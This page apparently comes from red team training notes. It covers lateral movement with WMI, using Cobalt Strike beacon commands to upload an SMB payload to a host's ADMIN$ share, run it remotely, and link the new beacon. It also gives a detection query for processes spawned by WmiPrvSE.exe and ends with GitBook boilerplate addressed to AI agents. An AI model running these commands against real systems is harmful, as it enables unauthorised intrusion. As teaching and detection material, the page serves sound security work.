> For the complete documentation index, see [llms.txt](https://yamortsa.gitbook.io/rto/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://yamortsa.gitbook.io/rto/lateral-movement/windows-management-instrumentation-wmi.md). # Windows Management Instrumentation (WMI) As you may have noticed, WMI is not part of the `jump` command but it is part of `remote-exec`. The `remote-exec` method uses WMI's "process call create" to execute any command we specify on the target. The most straight forward means of using this is to upload a payload to the target system and use WMI to execute it. You can upload a file to a remote machine by `cd`'ing to the desired UNC path and then use the `upload` command. ``` beacon> cd \\web.dev.cyberbotic.io\ADMIN$ beacon> upload C:\Payloads\smb_x64.exe beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe Started process 3280 on web.dev.cyberbotic.io ``` \\ The process is now running on WEB so now we need to connect to it. ``` beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10 [+] established link to child beacon: 10.10.122.30 ``` \\ As with WinRM, the process will be running in an elevated context of the calling user. ![](https://files.cdn.thinkific.com/file_uploads/584845/images/bc3/047/089/wmi.png) \\ When a binary is executed via WMI in this way, it will be a child of `WmiPrvSE.exe`. We can therefore look for process create events where WmiPrvSE is the parent. ``` event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe ``` \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/f3c/c95/e2c/wmiprvse.png) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/lateral-movement/windows-management-instrumentation-wmi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.